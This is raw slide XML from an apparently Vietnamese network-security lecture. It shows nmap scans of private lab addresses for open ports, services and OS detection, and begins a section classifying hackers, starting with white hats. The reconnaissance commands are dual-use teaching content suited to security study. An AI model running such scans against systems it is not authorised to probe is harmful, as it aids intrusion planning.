              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> port 80 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> port 22 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A08A4BB5-373B-2C6F-839E-792CDF1CBCD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="116920" y="1446308"/>
            <a:ext cx="5773261" cy="3894019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169137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73450-183D-5178-61B8-3A98F253BC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7C4DC62-47C1-12A7-EAFD-FFABC31F41E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8BCBAD7A-EDD4-DCC1-D69F-8F30CFDDFFD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77</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C9CA4D-43F7-2680-4D2F-D758EF0ADA35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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–p- -A 192.168.164.132 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sâu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6897789-596C-F248-6DFE-E2BA067D42DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="876300" y="863158"/>
            <a:ext cx="7391400" cy="4712119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75900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27CAC-746E-1DFF-271F-55434FE4834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74BAAF8-FAC8-ED9C-B358-AA18E45E715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88735C0-F21E-DAD9-DCF7-FE5E7C57582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78</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1971E00F-9C55-192C-B95C-7A1C809E78FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625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Địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cuối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> cùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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192.168.164.129</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A630E0B4-A723-2031-F995-4F978317F833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="983475"/>
            <a:ext cx="6248400" cy="4566402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD80F0A-D2CE-1F8A-B38E-E52B473DF747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-256541" y="1257300"/>
            <a:ext cx="3075941" cy="379847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dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Nên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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3000" b="1" kern="0" dirty="0" err="1">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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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–O 192.168.164.129 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>giao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00108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vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3955889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8C241-2927-B0AC-F6C0-AA0FA9C797F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778D34E-E52C-E3E4-A570-0A3C5496641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7DA17FF-5DA5-F61B-04FD-92DB1988F0A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79</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C69F6806-5493-1F91-176F-E81D585E24FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625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Tiến hành quét sâu hơn với hai tham số -p- và –A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F707A04-79EC-F1B8-F46C-B593EF85F410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="190122" y="1257301"/>
            <a:ext cx="8763756" cy="3962399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310112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95478"/>
            <a:ext cx="8455660" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>1.1.2. Phân loại đối tượng tấn công</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20"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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648970" y="974598"/>
            <a:ext cx="8229600" cy="365484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Hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Mũ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Trắng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>White</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Hat): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Đây</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là</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những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> hacker "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>có</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đạo</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đức</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sử</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dụng</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kiến</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thức</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và</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kỹ</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năng</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của</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họ</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để</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tìm</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kiếm</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lỗ</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hổng</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và</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bảo</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vệ</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hệ</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thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>mũ</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trắng</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thường</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được</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thuê</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bởi</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chính</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các</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tổ</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chức</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doanh</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nghiệp</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sở</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hữu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> website hay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
